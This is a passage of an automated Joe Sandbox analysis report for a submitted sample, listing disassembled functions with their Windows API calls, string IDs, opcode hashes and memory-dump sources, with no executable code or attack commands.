                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CopyVariant$ErrorLast
                                                                                                                                                                            • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                                                                            • API String ID: 2286883814-4206948668
                                                                                                                                                                            • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                                                            • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                                                                            • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                                                                            • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                                                                              • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                                                                            • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00475F18
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                                            • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                                                                            • API String ID: 3052893215-4176887700
                                                                                                                                                                            • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                                                                            • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                                                                            • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                                                                            • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                                                                            APIs
                                                                                                                                                                            • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                                                              • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                                                                            • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                                                                              • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                                                                            • String ID: Version$\TypeLib$interface\
                                                                                                                                                                            • API String ID: 656856066-939221531
                                                                                                                                                                            • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                            • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                                                                            • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                                                                            • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                            • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                                                                            • _printf.LIBCMT ref: 0045E7A9
                                                                                                                                                                            • _printf.LIBCMT ref: 0045E7D2
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                            • API String ID: 3590180749-2354261254
                                                                                                                                                                            • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                                                            • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                                                                            • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                                                            • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                                                                                                            • API String ID: 3038501623-2263619337
                                                                                                                                                                            • Opcode ID: 19a4eb4a0385f4e3e29933f3f54d071d1af3cac5b39b122aee5b24a105b2230c
                                                                                                                                                                            • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                                                                                                                            • Opcode Fuzzy Hash: 19a4eb4a0385f4e3e29933f3f54d071d1af3cac5b39b122aee5b24a105b2230c
                                                                                                                                                                            • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • _memset.LIBCMT ref: 00458194
                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                            • API String ID: 2255324689-22481851
                                                                                                                                                                            • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                            • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                                                                            • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                            • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                                                                            • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                                                                            • String ID: ($interface$interface\
                                                                                                                                                                            • API String ID: 2231185022-3327702407
                                                                                                                                                                            • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                                                            • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                                                                            • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                                                                            • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
                                                                                                                                                                            APIs
                                                                                                                                                                            • WSAStartup.WSOCK32(00000101,?), ref: 004365A5
                                                                                                                                                                            • gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
                                                                                                                                                                            • gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004365F5
                                                                                                                                                                            • WSACleanup.WSOCK32 ref: 004365FD
                                                                                                                                                                            • inet_ntoa.WSOCK32(00000100,?), ref: 00436624
                                                                                                                                                                            • _strcat.LIBCMT ref: 0043662F
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00436644
                                                                                                                                                                            • WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 00436666
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                            • API String ID: 2691793716-3771769585
                                                                                                                                                                            • Opcode ID: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                                                                                                            • Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
                                                                                                                                                                            • Opcode Fuzzy Hash: 72edaa20f59d4c855ae2a4057bf2e912041bb0bcae33cfe0ba1e7234a9852c49
                                                                                                                                                                            • Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
                                                                                                                                                                            • __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
                                                                                                                                                                              • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
                                                                                                                                                                              • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
                                                                                                                                                                            • GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
                                                                                                                                                                            • __lock.LIBCMT ref: 00416B8A
                                                                                                                                                                            • InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
                                                                                                                                                                            • __lock.LIBCMT ref: 00416BAB
                                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 00416BC9
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                                            • API String ID: 1028249917-2843748187
                                                                                                                                                                            • Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                                                            • Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
                                                                                                                                                                            • Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
                                                                                                                                                                            • Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
                                                                                                                                                                            • SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
                                                                                                                                                                            • CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
                                                                                                                                                                            • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
                                                                                                                                                                            • SendMessageW.USER32(?,00000402,?), ref: 0044941C
                                                                                                                                                                            • SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CharNext
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1350042424-0
                                                                                                                                                                            • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                            • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                                                                            • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                            • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                            • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                                                                            • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                            • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 00437DD7
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437DE9
                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,?,?,?,00000000), ref: 00437E5C
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 00437E70
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437E82
                                                                                                                                                                            • MoveWindow.USER32(00000000,?,00000000,?,?,00000000), ref: 00437EDB
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00437EEA
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00437EFC
                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00437F46
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 00437F55
                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 00437F6E
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00437F78
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054185349.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LlbpXphTu9.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                            • Opcode ID: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                                                            • Instruction ID: 6334a21bf5495bf578199e0a0c43900503e40640961724061e29feeedb49a886
                                                                                                                                                                            • Opcode Fuzzy Hash: 85b2574db82c4a067caaf632f6dab2f3668a9f7fdedc9eb4d1c33f4a9692aa02
                                                                                                                                                                            • Instruction Fuzzy Hash: 46511CB16083069FC318DF68DD85A2BB7E9ABC8300F144A2DF985D3391E6B4ED058B95
                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2054081989.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2054065509.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054128569.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2054148456.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
